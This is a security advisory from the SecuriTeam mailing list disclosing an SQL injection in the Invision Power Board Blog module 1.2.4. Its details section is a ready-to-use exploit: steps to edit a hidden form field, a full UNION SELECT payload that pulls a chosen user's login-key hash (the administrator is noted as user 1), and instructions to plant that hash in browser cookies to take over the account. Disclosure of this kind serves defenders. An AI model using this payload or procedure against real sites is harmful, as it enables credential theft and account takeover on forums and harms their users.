[UNIX] Invision Community Blog Mod 1.2.4 SQL Injection

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Invision Community Blog Mod 1.2.4 SQL Injection
------------------------------------------------------------------------


SUMMARY

<http://www.invisionboard.com/> Invision Power Board (IPB) is "a
professional forum system that has been built from the ground up with
speed and security in mind, taking advantage of object oriented code,
highly-optimized SQL queries, and the fast PHP engine. A comprehensive
administration control panel is included to help you keep your board
running smoothly. Moderators will also enjoy the full range of options
available to them via built-in tools and moderators control panel. Members
will appreciate the ability to subscribe to topics, send private messages,
and perform a host of other options through the user control panel. It is
used by millions of people over the world"

An SQL injection vulnerability found in Invision Power Board Blog module
version 1.2.4 allows attackers to run SQL queries and obtain users
passwords.

DETAILS

Exploit:
1. Open any blog entry
2. Try to reply to any message
3. Push "Preview message" button (Do not post your reply)
4. Save source code of opened page to your PC
5. Find this string <input type='hidden' name='eid' value='BLOG_ENTRY_ID'
/>

6. Change BLOG_ENTRY_ID with this SQL Injection:
BLOG_ENTRY_ID UNION SELECT b.entry_id, b.blog_id, b.category_id,
b.entry_author_id, b.entry_author_name, b.entry_date, member_login_key,
b.entry_category, b.entry, b.entry_status, b.entry_locked,
b.entry_num_comments, b.entry_last_comment, b.entry_last_comment_date,
b.entry_last_comment_name, b.entry_last_comment_mid,
b.entry_queued_comments, b.entry_has_attach, b.entry_post_key,
b.entry_edit_time, b.entry_edit_name, b.entry_html_state, b.entry_use_emo,
b.entry_trackbacks, b.entry_sent_trackbacks, b.entry_last_update,
b.entry_gallery_album, b.entry_poll_state, b.entry_last_vote FROM
ibf_members, ibf_blog_entries b WHERE id=USER_ID and
b.entry_id=BLOG_ENTRY_ID LIMIT 1,1

USER_ID - ID of the user whom password you want to get (admin user id is
1).

7. Push "Preview Button" again.
8. After refresh instead of blog entry name you will get users's HASH
password.
9. Change your cookies in your favorite browser and open board. You will
be automaticaly logged in as the user whom password you just got.


ADDITIONAL INFORMATION

The original article can be found at:
<http://www.milw0rm.com/exploits/2877>
http://www.milw0rm.com/exploits/2877



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages